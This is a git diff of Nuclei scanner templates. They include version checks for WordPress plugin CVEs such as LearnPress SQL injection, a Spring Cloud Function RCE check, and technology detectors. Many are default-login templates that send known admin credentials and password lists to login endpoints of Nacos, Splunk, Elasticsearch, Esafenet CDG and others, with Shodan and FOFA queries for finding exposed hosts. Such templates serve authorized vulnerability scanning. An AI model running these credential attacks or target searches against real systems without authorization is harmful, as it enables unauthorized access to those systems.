b/poc/cve/CVE-2024-8529-e2a9975debb93f28e1a8c207f744d964.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8529-e2a9975debb93f28e1a8c207f744d964 + +info: + name: > + LearnPress – WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_fields' + author: topscoder + severity: critical + description: > + The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_fields' parameter of the /wp-json/lp/v1/courses/archive-course REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c2b2671e-0db7-4ba9-b574-a0122959e8fc?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2024-8529 + metadata: + fofa-query: "wp-content/plugins/learnpress/" + google-query: inurl:"/wp-content/plugins/learnpress/" + shodan-query: 'vuln:CVE-2024-8529' + tags: cve,wordpress,wp-plugin,learnpress,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/learnpress/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "learnpress" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.2.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3.yaml b/poc/cve/CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3.yaml new file mode 100644 index 0000000000..7d1bcfee4c --- /dev/null +++ b/poc/cve/CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-8622-0703e404cdba311680d3e36cfe2a24e3 + +info: + name: > + amCharts: Charts and Maps <= 1.4.4 - Reflected Cross-Site Scripting via Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The amCharts: Charts and Maps plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'amcharts_javascript' parameter in all versions up to, and including, 1.4.4 due to the ability to supply arbitrary JavaScript a lack of nonce validation on the preview functionality. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5e3593e8-3840-4db0-8269-61bbcb50d569?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-8622 + metadata: + fofa-query: "wp-content/plugins/amcharts-charts-and-maps/" + google-query: inurl:"/wp-content/plugins/amcharts-charts-and-maps/" + shodan-query: 'vuln:CVE-2024-8622' + tags: cve,wordpress,wp-plugin,amcharts-charts-and-maps,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/amcharts-charts-and-maps/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "amcharts-charts-and-maps" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.4') \ No newline at end of file diff --git a/poc/cve/cve-2018-3714.yaml b/poc/cve/cve-2018-3714.yaml index 50093afd70..e44ca7a0b5 100644 --- a/poc/cve/cve-2018-3714.yaml +++ b/poc/cve/cve-2018-3714.yaml @@ -1,18 +1,16 @@ id: CVE-2018-3714 - info: name: node-srv Path Traversal author: madrobot severity: medium - description: node-srv node module suffers from a Path Traversal vulnerability due to lack of validation of url, which allows a malicious user to read content of any file with known path. - reference: - - https://hackerone.com/reports/309124 + reference: https://hackerone.com/reports/309124 + tags: cve,cve2018,nodejs,lfi classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 6.5 + cvss-score: 6.50 cve-id: CVE-2018-3714 cwe-id: CWE-22 - tags: cve,cve2018,nodejs,lfi + description: "node-srv node module suffers from a Path Traversal vulnerability due to lack of validation of url, which allows a malicious user to read content of any file with known path." requests: - method: GET diff --git a/poc/cve/cve-2020-26876.yaml b/poc/cve/cve-2020-26876.yaml index eac2144278..6559ee1788 100644 --- a/poc/cve/cve-2020-26876.yaml +++ b/poc/cve/cve-2020-26876.yaml @@ -1,57 +1,36 @@ id: CVE-2020-26876 - info: name: WordPress WP Courses Plugin Information Disclosure author: dwisiswant0 severity: high description: WordPress WP Courses Plugin < 2.0.29 contains a critical information disclosure which exposes private course videos and materials. - impact: | - An attacker can exploit this vulnerability to gain sensitive information about the WordPress WP Courses Plugin. - remediation: | - Update to the latest version of the WordPress WP Courses Plugin (1.0.9) to fix the information disclosure vulnerability. + tags: wordpress,plugin reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-26876 - https://www.exploit-db.com/exploits/48910 - https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/ - - https://plugins.trac.wordpress.org/changeset/2388997 - - https://plugins.trac.wordpress.org/changeset/2389243 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 cve-id: CVE-2020-26876 - cwe-id: CWE-306 - epss-score: 0.01988 - epss-percentile: 0.8756 - cpe: cpe:2.3:a:wpcoursesplugin:wp-courses:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: wpcoursesplugin - product: wp-courses - framework: wordpress - tags: cve,cve2020,wordpress,wp-plugin,exposure,edb,wpcoursesplugin - -http: +requests: - method: GET path: - "{{BaseURL}}/wp-json/wp/v2/lesson/1" - matchers-condition: and matchers: - - type: word - part: header - words: - - "application/json" - - type: regex - part: body regex: - "rest_post_invalid_id" - "\"(guid|title|content|excerpt)\":{\"rendered\":" condition: or - + part: body + - type: word + words: + - "application/json" + part: header - type: status status: - 200 - 404 condition: or -# digest: 4a0a00473045022100bac7ab1c102483005544a8092e8ebf09e74b5e8e497a2619f0aa05b7e4d877640220469c403326592d174fb4d0dc48c2bbba4aba553242fd2ba06bbcf788c29951f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/03/21 diff --git a/poc/cve/cve-2021-24276.yaml b/poc/cve/cve-2021-24276.yaml index b85e96822a..0e7cc9ec1f 100644 --- a/poc/cve/cve-2021-24276.yaml +++ b/poc/cve/cve-2021-24276.yaml @@ -8,10 +8,9 @@ info: reference: - https://wpscan.com/vulnerability/1301123c-5e63-432a-ab90-3221ca532d9c - https://nvd.nist.gov/vuln/detail/CVE-2021-24276 - - http://packetstormsecurity.com/files/164308/WordPress-Contact-Form-1.7.14-Cross-Site-Scripting.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2021-24276 cwe-id: CWE-79 tags: wordpress,cve,cve2021,wp-plugin diff --git a/poc/cve/cve-2022-22963.yaml b/poc/cve/cve-2022-22963.yaml index d04177443d..39a36176e1 100644 --- a/poc/cve/cve-2022-22963.yaml +++ b/poc/cve/cve-2022-22963.yaml @@ -6,6 +6,10 @@ info: severity: critical description: | Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: | + Apply the latest security patches provided by the Spring Cloud project to mitigate this vulnerability. reference: - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE @@ -17,10 +21,17 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-22963 - cwe-id: CWE-94 - tags: cve,cve2022,springcloud,rce + cwe-id: CWE-94,CWE-917 + epss-score: 0.97537 + epss-percentile: 0.99993 + cpe: cpe:2.3:a:vmware:spring_cloud_function:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: vmware + product: spring_cloud_function + tags: cve,cve2022,vulhub,springcloud,rce,kev,vmware -requests: +http: - raw: - | POST /functionRouter HTTP/1.1 @@ -42,5 +53,4 @@ requests: - type: status status: - 500 - -# Enhanced by mp on 2022/05/19 +# digest: 490a0046304402205d6843e61f79f6f923c45f295fdbd23eb8553580f133f3595140c997e398c304022032df92fd24048679c909836db50aeef2682dfff4b5c6e8a8e844e32c0a7de57e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/default/Mantis-Default_login.yaml b/poc/default/Mantis-Default_login.yaml index 9a5d0f2295..58cb63c201 100644 --- a/poc/default/Mantis-Default_login.yaml +++ b/poc/default/Mantis-Default_login.yaml @@ -6,12 +6,12 @@ info: description: A MantisBT default admin login was discovered. reference: - https://mantisbt.org/ + metadata: + shodan-query: title:"MantisBT" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - metadata: - shodan-query: title:"MantisBT" tags: mantisbt,default-login requests: - raw: diff --git a/poc/default/bloofoxcms-default-login.yaml b/poc/default/bloofoxcms-default-login.yaml new file mode 100644 index 0000000000..94317594f5 --- /dev/null +++ b/poc/default/bloofoxcms-default-login.yaml @@ -0,0 +1,42 @@ +id: bloofoxcms-default-login + +info: + name: bloofoxCMS - Default Login + author: theamanrawat + severity: high + description: | + bloofoxCMS contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. + reference: + - https://www.bloofox.com/automated_setup.113.html + - https://www.bloofox.com + metadata: + verified: "true" + max-request: 1 + fofa-query: "Powered by bloofoxCMS" + tags: bloofox,cms,default-login + +http: + - raw: + - | + POST /admin/index.php HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}}&action=login + + attack: pitchfork + payloads: + username: + - "admin" + password: + - "admin" + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - contains(body, 'bloofoxCMS Admincenter') + - status_code == 200 + condition: and + +# digest: 4b0a00483046022100b9ba4676dd13debd11f72527dcd0e4bc7cd120efb61658f9e7270fe85c3b9b9b022100d82c3493478c008849f179f16de4746febc9b91f6ee3c1bbadcff8652341c03f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/default/dataease-default-login.yaml b/poc/default/dataease-default-login.yaml new file mode 100644 index 0000000000..de2c5d7694 --- /dev/null +++ b/poc/default/dataease-default-login.yaml @@ -0,0 +1,45 @@ +id: dataease-default-login + +info: + name: Dataease - Default Login + author: DhiyaneshDK + severity: high + description: | + Dataease has a built-in account demo/dataease, and many developers forget to delete or change the account password. + As a result, many Dataease can log in with this built-in account. + reference: + - https://github.com/dataease/dataease/issues/5995 + metadata: + verified: true + max-request: 1 + shodan-query: html:"Dataease" + tags: default-login,dataease + +http: + - method: POST + path: + - "{{BaseURL}}/api/auth/login" + + headers: + Content-Type: application/json + + body: | + { + "username": "HmFJtDmMa9MZjlWEpCNAo7Yh/hRBI7mrCRfFTok7wES7qcpIJ04x0OQXW5fwtL4WtN29408wyAupmtMjvvXjag==", + "password": "sL+oQsnErJMYGiLyzXj/Hy2opaZcSnfjGtYtm48q8tdkkINxzTtAOFI2NgDoorchFE790vWQYIgo1CMyjJ2jnw==", + "loginType": 0 + } + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"success":true' + - '"token":' + condition: and + + - type: status + status: + - 200 +# digest: 4a0a00473045022100f845a84ad7189dffccd1afea970ebb8f5e601b044da1562e014ab66c8f70e3a9022066c79ccdd3db85aae25fffd20633c098d785a2769347ea37c120f0fb36b1fc0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/default/default-apache-shiro.yaml b/poc/default/default-apache-shiro.yaml new file mode 100644 index 0000000000..259a94706c --- /dev/null +++ b/poc/default/default-apache-shiro.yaml @@ -0,0 +1,29 @@ +id: default-apache-shiro + +info: + name: Apache Shiro Default Page + author: DhiyaneshDK + severity: info + metadata: + verified: true + max-request: 1 + shodan-query: title:"Apache Shiro Quickstart" + tags: tech,apache,shiro + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Apache Shiro Quickstart" + + - type: status + status: + - 200 + +# digest: 490a0046304402206679e43f4e2125fa6ab7f37680f2c0464b2b7251690168259de5ac9c1f18fb51022071a731cd2862bb734edb2e7491f15198961599fa7ed8cb84bfa49805b92df0f3:922c64590222798bb761d5b6d8e72950 diff --git a/poc/default/elasticsearch-default-login.yaml b/poc/default/elasticsearch-default-login.yaml new file mode 100644 index 0000000000..330f016c3d --- /dev/null +++ b/poc/default/elasticsearch-default-login.yaml @@ -0,0 +1,53 @@ +id: elasticsearch-default-login + +info: + name: ElasticSearch - Default Login + author: Mohammad Reza Omrani | @omranisecurity + severity: high + description: | + Elasticsearch default credentials were discovered. + reference: + - https://www.alibabacloud.com/blog/what-is-the-default-username-and-password-for-elasticsearch_599610 + - https://www.elastic.co/guide/en/elasticsearch/reference/current/built-in-users.html + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"Elastic" || http.favicon.hash:1328449667 + tags: default-login,elasticsearch + +http: + - raw: + - | + POST /internal/security/login HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows; Windows NT 10.1; Win64; x64; en-US) Gecko/20100101 Firefox/49.5 + Referer: {{RootURL}}/login + Content-Type: application/json + kbn-version: 8.8.2 + x-kbn-context: %7B%22name%22%3A%22security_login%22%2C%22url%22%3A%22%2Flogin%22%7D + Origin: {{RootURL}} + + {"providerType":"basic","providerName":"basic","currentURL":"{{BaseURL}}/login","params":{"username":"{{username}}","password":"{{password}}" }} + + payloads: + username: + - elastic + password: + - changeme + attack: pitchfork + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Set-Cookie: sid=' + - 'kbn-license-sig:' + condition: and + case-insensitive: true + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100a3408fad3b3714582be692b490de830c2bab27c538a3019730304baf29a3d925022100dedbe43013a6624ea26d84bfc6e3d742cb51405bcf8e14b5c137372eb72f7dd6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/default/esafenet-cdg-default-login.yaml b/poc/default/esafenet-cdg-default-login.yaml new file mode 100644 index 0000000000..93cf1ce1f1 --- /dev/null +++ b/poc/default/esafenet-cdg-default-login.yaml @@ -0,0 +1,56 @@ +id: esafenet-cdg-default-login + +info: + name: Esafenet CDG - Default Login + author: chesterblue + severity: high + description: | + Esafenet electronic document security management system default credentials were discovered. + metadata: + verified: true + max-request: 32 + fofa-query: esafenet + tags: esafenet,cdg,default-login + +http: + - method: POST + path: + - "{{BaseURL}}/CDGServer3/SystemConfig" + + headers: + content-type: application/x-www-form-urlencoded + + body: "command=Login&help=null&verifyCodeDigit=dfd&name={{username}}&pass={{password}}" + attack: clusterbomb + payloads: + username: + - "systemadmin" + - "configadmin" + - "secadmin" + - "docadmin" + password: + - "Est@Spc820" + - "12345678" + - "123456" + - "Est@Spc2018" + - "Est@Spc2019" + - "Est@Spc2020" + - "Est@Spc2021" + - "Est@Spc2022" + + matchers-condition: and + matchers: + - type: word + words: + - "est.connection.url" + + - type: regex + part: body + regex: + - "(127\\.0\\.0\\.1)|(localhost)(192\\.168|10\\.|172\\.(1[6-9]|2\\d|3[01]))\\.\\d{1,3}\\.\\d{1,3}" + + - type: status + status: + - 200 + +# digest: 4a0a00473045022100e6e8037638c7053279429fb10ae4c9c6af87bb9bdbad0ffe087b547602459da902202536491397bc2e5c2c80d4d23ec7e65a7710ebf3e14aa5bc223315c1363deaa6:922c64590222798bb761d5b6d8e72950 diff --git a/poc/default/feiyuxing-default-login.yaml b/poc/default/feiyuxing-default-login.yaml new file mode 100644 index 0000000000..dbed124320 --- /dev/null +++ b/poc/default/feiyuxing-default-login.yaml @@ -0,0 +1,51 @@ +id: feiyuxing-default-login + +info: + name: Feiyuxing Enterprise-Level Management System - Default Login + author: SleepingBag945 + severity: high + description: | + Attackers can log in through admin:admin, check the system status, and configure the device. + reference: + - https://github.com/wushigudan/poc/blob/main/%E9%A3%9E%E9%B1%BC%E6%98%9F%E9%BB%98%E8%AE%A4%E5%AF%86%E7%A0%81.py + metadata: + verified: true + max-request: 1 + fofa-query: title="飞鱼星企业级智能上网行为管理系统" + tags: feiyuxing,default-login,iot + +http: + - raw: + - | + POST /send_order.cgi?parameter=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + {"username":"{{username}}","password":"{{password}}"} + + attack: pitchfork + payloads: + username: + - admin + password: + - admin + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"msg":"ok"' + - '"type":' + condition: and + + - type: word + part: header + words: + - 'hash_key=' + + - type: status + status: + - 200 + +# digest: 4a0a0047304502201fb4a76b318f9c3a0993dd312148f6a0823954ab3354a41be198c6917ee1c059022100ad6214108becac7c0bdcd5a523f67d04cde7b3efbfc1d4e1a9395c79f992af0f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/default/kylin-default-login.yaml b/poc/default/kylin-default-login.yaml new file mode 100644 index 0000000000..cb1fb20d6c --- /dev/null +++ b/poc/default/kylin-default-login.yaml @@ -0,0 +1,55 @@ +id: kylin-default-login + +info: + name: Apache Kylin Console - Default Login + author: SleepingBag945 + severity: high + description: | + The default password for the Apache Kylin Console is KYLIN for the ADMIN user in Kylin versions before 3.0.0. + reference: + - https://github.com/hanc00l/pocGoby2Xray/blob/main/xraypoc/Apache_Kylin_Console_Default_password.yml + - https://github.com/Wker666/Demo/blob/main/script/%E6%BC%8F%E6%B4%9E%E6%8E%A2%E6%B5%8B/Kylin/Apache%20Kylin%20Console%20%E6%8E%A7%E5%88%B6%E5%8F%B0%E5%BC%B1%E5%8F%A3%E4%BB%A4.wker + metadata: + verified: true + max-request: 6 + fofa-query: app="APACHE-kylin" + tags: kylin,default-login,apache + +http: + - raw: + - | + GET /kylin/api/user/authentication HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + + attack: clusterbomb + payloads: + username: + - ADMIN + - admin + password: + - KYLIN + - kylin + - 123456 + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"userDetails":' + - '"username":' + - '"password":' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + +# digest: 490a0046304402201fcf0b913c72b187052e4b5e7871e7d0e5b5df5339bb686cba1d688f6b12ab5702201e25e7c9eaedcea9be02d16d4759ab89f87e1bbd505c6144f94e671bc2b25db0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/default/leostream-default-login.yaml b/poc/default/leostream-default-login.yaml new file mode 100644 index 0000000000..19ff436f70 --- /dev/null +++ b/poc/default/leostream-default-login.yaml @@ -0,0 +1,53 @@ +id: leostream-default-login + +info: + name: Leostream Default Login + author: bhutch + severity: high + description: | + Leostream default admin credentials were discovered. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"Leostream" + tags: leostream,default-login + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + + login_type=0&user={{username}}&password={{password}}&submit=SIGN+IN + + payloads: + username: + - admin + password: + - leo + attack: pitchfork + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "Set-Cookie: lld=%21" + + - type: word + part: header + words: + - 'index.pl' + - 'server.pl' + - 'status.pl' + condition: or + + - type: status + status: + - 302 + +# digest: 4a0a004730450221009d6b9b830062d1842295e184eb57d4ee56e1f1e4ef08c04432d2b7228f38ab4b02203ad0601a6b79882c8f54b7885cb11581f4eacf1ed0f5323f0b78c6014ad3a761:922c64590222798bb761d5b6d8e72950 diff --git a/poc/default/nacos-default-login.yaml b/poc/default/nacos-default-login.yaml new file mode 100644 index 0000000000..4d14e9d597 --- /dev/null +++ b/poc/default/nacos-default-login.yaml @@ -0,0 +1,58 @@ +id: nacos-default-login + +info: + name: Alibaba Nacos - Default Login + author: SleepingBag945 + severity: high + description: | + The default username and password for Nacos are both nacos. + metadata: + verified: true + max-request: 2 + fofa-query: title=="Nacos" + tags: nacos,default-login,alibaba + +http: + - raw: + - | + POST /v1/auth/users/login HTTP/1.1 + Host: {{Hostname}} + User-Agent: Nacos-Server + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + - | + POST /nacos/v1/auth/users/login HTTP/1.1 + Host: {{Hostname}} + User-Agent: Nacos-Server + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + + attack: pitchfork + payloads: + username: + - nacos + password: + - nacos + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"accessToken":' + - '"username":' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + +# digest: 4a0a00473045022100f1e6f9c8dd27b0141b612bb668588d99e6709603a0cda653f7a1c6a7f882728d02202fb57fdfd3c7e625aed2f17eadc5a8ef82f752c7a5d50e963e616cbf763d639d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/default/nodered-default-login.yaml b/poc/default/nodered-default-login.yaml new file mode 100644 index 0000000000..12548d6fb5 --- /dev/null +++ b/poc/default/nodered-default-login.yaml @@ -0,0 +1,51 @@ +id: nodered-default-login + +info: + name: Node-Red - Default Login + author: savik + severity: critical + description: | + Allows attacker to log in and execute RCE on the Node-Red panel using the default credentials. + reference: + - https://quentinkaiser.be/pentesting/2018/09/07/node-red-rce/ + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:321591353 + tags: default-login,node-red,dashboard + +http: + - raw: + - | + POST /auth/token HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded;charset=UTF-8 + + client_id=node-red-editor&grant_type=password&scope=&username={{username}}&password={{password}} + + attack: pitchfork + payloads: + username: + - admin + password: + - password + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'access_token":' + - 'expires_in":' + - 'token_type":' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 +# digest: 4b0a00483046022100d8d30003eefbac42678e7c0af4ef56d03cd3238cba5804360b9614d7555be2d5022100816a15007caea2f57c4b763f5b060505ecf5d16be221481b679bd26dbc74583d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/default/pyload-default-login.yaml b/poc/default/pyload-default-login.yaml new file mode 100644 index 0000000000..b626545bb3 --- /dev/null +++ b/poc/default/pyload-default-login.yaml @@ -0,0 +1,46 @@ +id: pyload-default-login + +info: + name: PyLoad Default Login + author: DhiyaneshDk + severity: high + description: | + PyLoad Default Credentials were discovered. + reference: + - https://pypi.org/project/pyload-ng/#:~:text=Default%20username%3A%20pyload%20.,Default%20password%3A%20pyload%20. + metadata: + verified: true + max-request: 1 + shodan-query: html:"pyload" + tags: default-login,pyload + +http: + - raw: + - | + POST /login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + do=login&username={{username}}&password={{password}}&submit=Login + + payloads: + username: + - pyload + password: + - pyload + attack: pitchfork + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Set-Cookie: pyload_session=' + - '/dashboard' + condition: and + + - type: status + status: + - 302 + +# digest: 4b0a00483046022100887e6f5542621f9fd95a3e282c0a2de60e2fe8e1e0fc0fcbe1dd257885cb5d63022100a040e0e40efa61edc561c8aa3f0a00637973247e99c02bf2eef6d4d6a7aadbbc:922c64590222798bb761d5b6d8e72950 diff --git a/poc/default/splunk-default-login.yaml b/poc/default/splunk-default-login.yaml new file mode 100644 index 0000000000..8afecbbefe --- /dev/null +++ b/poc/default/splunk-default-login.yaml @@ -0,0 +1,69 @@ +id: splunk-default-login + +info: + name: Splunk - Default Password + author: pussycat0x + severity: high + description: | + Splunk Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security. + metadata: + verified: true + max-request: 9 + shodan-query: http.title:"Splunk" + tags: default-login,splunk + +http: + - raw: + - | + GET /en-US/account/login?return_to=%2Fen-US%2Faccount%2F HTTP/1.1 + Host: {{Hostname}} + - | + POST /en-US/account/login HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate, br + Referer: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + Origin: {{BaseURL}} + + {{cval}}&username={{username}}&password={{password}}&return_to=%2Fen-US%2F&set_has_logged_in=false + - | + GET /en-US/splunkd/__raw/services/server/health/splunkd?output_mode=json&_= HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate, br + Referer: {{BaseURL}} + + attack: pitchfork + payloads: + username: + - "admin" + - "splunk" + - "root" + password: + - "admin" + - "splunk" + - "toor" + + stop-at-first-match: true + host-redirects: true + matchers-condition: and + matchers: + - type: word + part: body_3 + words: + - "splunkd" + - "updated" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + internal: true + name: cval + part: header + regex: + - 'cval=([0-9]+)' +# digest: 4b0a00483046022100ce91d4b9bd6a78ad0f1da61f3e9222cdb9db0f17bd4baa08ad302f1a57013161022100f2a44470cac093eedcba91b9a41d16f1c1141f063824121f54ebe9568bfab88f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/detect/4D-detect.yaml b/poc/detect/4D-detect.yaml index 33d6117a38..094712f06e 100644 --- a/poc/detect/4D-detect.yaml +++ b/poc/detect/4D-detect.yaml @@ -10,8 +10,8 @@ info: - https://doc.4d.com/4Dv18/4D/18.4/URLs-and-Form-Actions.300-5232844.en.html - https://doc.4d.com/4Dv18/4D/18.4/Information-about-the-Web-Site.300-5232828.en.html metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"4DACTION/" tags: 4D,detect,tech @@ -44,4 +44,4 @@ http: group: 1 regex: - 'Server:\s+4D(?:_V[0-9]+)?/([0-9.]+)' -# digest: 4a0a00473045022015e3c4a42238602221b5c8c9705997a09295140001b69bc7f96add5bf8d2bb29022100ea291331d1cd6e98dd0439ca096c434691cd400c010705fd357b7378d9cfd11b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f7a8acd9ea27d789dfe331eff80913f64f9ee6fe84c386fab6035b8ea0fa2bb602210091d93c4de5b4d1c943d244e07faf8403d8c4b2b59c5716ca5810cb9987ca6384:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/detect/bamboo-detect.yaml b/poc/detect/bamboo-detect.yaml new file mode 100644 index 0000000000..b4cf9aa185 --- /dev/null +++ b/poc/detect/bamboo-detect.yaml @@ -0,0 +1,35 @@ +id: bamboo-detect + +info: + name: Bamboo - Detection + author: bhutch + severity: info + description: | + Detect the presence of Bamboo, a CI/CD tool. + metadata: + verified: true + max-request: 1 + vendor: atlassian + shodan-query: http.favicon.hash:-1379982221 + category: devops + tags: tech,bamboo,atlassian,detect,cicd + +http: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + matchers: + - type: dsl + dsl: + - contains(to_lower(body), "log into atlassian - atlassian bamboo") + - contains(to_lower(body), "meta name=\"application-name\" content=\"bamboo\" />") + + extractors: + - type: regex + name: version + group: 1 + regex: + - '(?i)atlassian bamboo version (.*) -' +# digest: 490a00463044022054fee6be26df8b05fe917fc020a1087009848dc48a25b2df27954e6f1d71ac4802205b3267d31138e786117de003787658c20c23a8956efe95880a085e183df4ab62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/detect/burp-collaborator-detect.yaml b/poc/detect/burp-collaborator-detect.yaml new file mode 100644 index 0000000000..c63c2ce4f1 --- /dev/null +++ b/poc/detect/burp-collaborator-detect.yaml @@ -0,0 +1,44 @@ +id: burp-collaborator-detect + +info: + name: Burp Collaborator Server - Detect + author: lum8rjack + severity: info + description: | + Burp Collaborator server detected. + reference: + - https://portswigger.net/burp/documentation/collaborator + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + verified: true + max-request: 1 + shodan-query: "Server: Burp Collaborator" + tags: burp,tech,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "Server: Burp Collaborator https://burpcollaborator.net/" + + - type: status + status: + - 200 + + extractors: + - type: regex + part: header + group: 1 + regex: + - "(?:X-(Collaborator-Version: [0-9]))" + +# digest: 4b0a00483046022100f9470eae136929c08d076b3d7cb40c182a6c6bc4da1a7c9169bbc8ce9d354063022100f9973d7a77162a39c2deaf779a2409b0ae4d95fb2ba9203794827aca3a3f2027:922c64590222798bb761d5b6d8e72950 diff --git a/poc/detect/casaos-detection.yaml 